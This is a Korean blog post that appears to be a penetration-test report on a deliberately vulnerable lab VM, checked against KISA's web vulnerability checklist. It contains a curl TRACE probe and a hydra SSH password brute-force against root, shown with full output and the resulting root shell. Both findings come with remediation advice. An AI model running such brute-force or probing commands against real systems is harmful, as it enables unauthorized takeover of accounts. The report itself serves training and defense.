홈페이지 취약점 분석 이야기 파일 지도 사진 깨알






>> 목록보이기
#weak-root-pw #웹취약성 분석보고서 #nmap #curl #hydra #ServerTokens #TRACE

weak-root-pw 취약점분석 보고서

취약점분석 요약

weak-root-pw 웹 서버는 root 계정의 비밀번호가 취약하여 시스템이 장악당할 위험성이 매우 높아서 root의 비밀번호 변경이 시급함.

시스템 장악 위험성 존재

  • (22) 취약한 서버 설정 취약점 [위험도 상]
    root 계정의 비밀번호가 취약하며 외부에서 SSH로 접속이 가능하여 시스템을 장악할 수 있었음

추가공격에 도움을 줄 소지가 있는 취약점

  • (21) 웹 서비스 메소드 설정 공격 취약점 [위험도 하]
    불필요한 HTTP 메소드인 TRACE를 허용하고 있어서 XST 공격의 가능성 존재
  • (22) 취약한 서버 설정 취약점 [위험도 하]
    HTTP 헤더에서 웹서버 소프트웨어의 버전 정보 노출: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.0g DAV/2 PHP/5.2.17

취약점 상세 설명

(1) 운영체제 명령 실행

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.9

 

(2) SQL 인젝션

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.13

 

(3) XPath 인젝션

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.16

 

(4) 정보누출

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.19

 

(5) 악성콘텐츠

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.22

 

(6) 크로스 사이트 스크립트(XSS)

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.24

 

(7) 약한 문자열 강도

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.29

 

(8) 불충분한 인증 및 인가

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.33

 

(9) 취약한 패스워드 복구

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.36

 

(10) 불충분한 세션 관리

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.38

 

(11) 크로스 사이트 리퀘스트 변조(CSRF)

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.42

 

(12) 자동화 공격

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.46

 

(13) 파일 업로드

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.49

 

(14) 경로추적 및 파일 다운로드

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.52>

 

(15) 데이터 평문전송

[참고자료]

   - 탐지사항 없음

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.55

 

(16) 쿠키 변조

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.58

 

(17) URL/파라미터 변조

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.61

 

(18) 디렉터리 인덱싱

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.63

 

(19) 관리자페이지 노출

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.66

 

(20) 위치공개

   - 탐지사항 없음

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.68

 

(21) 웹 서비스 메소드 설정 공격

[탐지사항]

  • Apache 웹서버가 TRACE 메소드를 허용하고 있어서 XST(Cross-site Tracing) 공격에 악용될 소지가 있음

[취약점 경로]

  • curl -v -X TRACE http://192.168.189.221 (위험도 하)

[취약점 증빙 자료]

root@kali:~# curl -v -X TRACE http://192.168.206.132 --header "Fake: this should not be reflected"
* Rebuilt URL to: http://192.168.206.132/
*   Trying 192.168.206.132...
* Connected to 192.168.206.132 (192.168.206.132) port 80 (#0)
> TRACE / HTTP/1.1
> Host: 192.168.206.132
> User-Agent: curl/7.50.1
> Accept: */*
> Fake: this should not be reflected
> 
< HTTP/1.1 200 OK
< Date: Thu, 17 Nov 2016 10:38:12 GMT
< Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.0g DAV/2 PHP/5.2.17
< Transfer-Encoding: chunked
< Content-Type: message/http
< 
TRACE / HTTP/1.1
Host: 192.168.206.132
User-Agent: curl/7.50.1
Accept: */*
Fake: this should not be reflected

* Connection #0 to host 192.168.206.132 left intact
root@kali:~#

[ curl을 이용하여 TRACE 메소드 점검: 헤더가 내용에 출력됨 ]

[취약점 조치방안]

  • /etc/apache/httpd.conf 파일의 마지막에 "TraceEnable Off를 한줄 추가하고 Apache 웹서버를 재기동한다.
    - 예: # apachectl stop; apachectl start

[참고자료]

  • “정보시스템 개발‧운영자를 위한 홈페이지 취약점 진단‧제거 가이드”, 한국인터넷진흥원(KISA), 2013.12., p.70

 

(22) 취약한 서버 설정

[탐지사항]

  • root 계정의 비밀번호가 취약하여 무작위대입공격으로 노출(위험도 상)
  • HTTP 헤더에서 웹서버 소프트웨어의 버전 정보 노출하여 추가 공경에 도움을 줄 소지가 있음
    - Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.0g DAV/2 PHP/5.2.17 (위험도 하)

[취약점 경로]

  • root 계정의 비밀번호 취약 및 SSH 외부 개방(위험도 상)
  • curl -v http://192.168.206.132 (Server: 헤더에서 웹서버 환경 노출, 위험도 하)

[취약점 증빙 자료]

root@kali:~# time hydra -l root -P weakpass.txt 192.168.206.132 ssh -t 1
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-11-17 11:11:20
[DATA] max 1 task per 1 server, overall 64 tasks, 535 login tries (l:1/p:535), ~8 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 165.00 tries/min, 165 tries in 00:01h, 370 to do in 00:03h, 1 active
[STATUS] 161.00 tries/min, 483 tries in 00:03h, 52 to do in 00:01h, 1 active
[22][ssh] host: 192.168.206.132   login: root   password: ******
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-11-17 11:14:29

real	3m9.332s
user	0m0.720s
sys	0m0.228s
root@kali:~# ssh root@192.168.206.132

Secure login on SliTaz GNU/Linux powered by Dropbear SSH server.
root@192.168.206.132's password: 

  Welcome to the Open Source World!
  
  SliTaz GNU/Linux is distributed in the hope that it will be useful,
  but with ABSOLUTELY NO WARRANTY.

root@weakpw:~# id
uid=0(root) gid=0(root) groups=0(root),6(disk),10(wheel)
root@weakpw:~# uname -a
Linux weakpw 2.6.37-slitaz #2 SMP Thu May 16 19:27:13 CEST 2013 i686 GNU/Linux
root@weakpw:~#

[ root 계정을 대상으로 무작위대입공격 성공후 root로 로그인 ]

root@kali:~# curl -I http://192.168.206.132
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2016 11:04:20 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.0g DAV/2 PHP/5.2.17
Last-Modified: Wed, 16 Nov 2016 00:24:42 GMT
ETag: "b5e-3cb-541601960e680"
Accept-Ranges: bytes
Content-Length: 971
Content-Type: text/html

root@kali:~#

[ pentesterlab HTTP Server 헤더에서 웹서버 정보 노출 ]

[취약점 조치방안]

  • root 계정의 비밀번호를 현실적인 시간내에 추정이 불가능하게 변경하여야 한다(15자리 이상 권고). 또한 방화벽 설정을 통해 관리자 PC에서만 ssh로 접속할 수 있도록 접근을 제한해야 한다.
  • Server 헤더 간소화: /etc/apache/httpd.conf 파일의 끝에 "ServerTokens Prod" 한줄을 추가하고 Apache 웹서버를 재구동한다(apachectl restart).

[처음 작성한 날: 2016.11.17]    [마지막으로 고친 날: 2016.11.17] 


< 이전 글 : [웹해킹훈련장] 취약한 비밀번호: WH-weak-root-pw 실습 설명서 (2016.11.16)

> 다음 글 : 슬리타즈 리눅스 4.0 설치와 웹해킹훈련장 Live ISO 만들기 (2016.11.15)


크리에이티브 커먼즈 라이선스 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문
 __
( 소프트웨어 설계를 하는 두가지 방법이  )
( 있다. 하나는 빠진 게 없는지 쉽게  )
( 확인할 수 있게 최대한 단순하게 만드는  )
( 것이고, 또 한가지는 빠진 게 없는지  )
( 확인할 수 없게 최대한 복잡하게 만드는  )
( 것이다.  )
(  )
( - C.A.R. Hoare, Quick Sort의 고안자  )
 --
     o
      o
          oO)-.                       .-(Oo
         /__  _\                     /_  __\
         \  \(  |     ()~()         |  )/  /
          \__|\ |    (-___-)        | /|__/
          '  '--'    ==`-'==        '--'  '
.. -- -- | - .. .... | ... / .. .../ ... {] . .. .. .. ..| ...... .../ .../ .. ...... ... ... ] .. [ .../ ..../ ......./ .. ./// ../ ... .. ... .. -- -- | - .. .... | ... / .. .../ ... {] . .. .. .. ..| ...... .../ .../ .. ./// ../ ... .. ... ...| ..../ ./ ... / ..| ....| ........ / ... / .... ...... ... ... ] .. [ .../ ..../ ......./ .....| ..../ ./ ... / ..| ....| ........ / ... / .... ...| ..../ ./ ... / ..| ....| ........ / ... / .... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .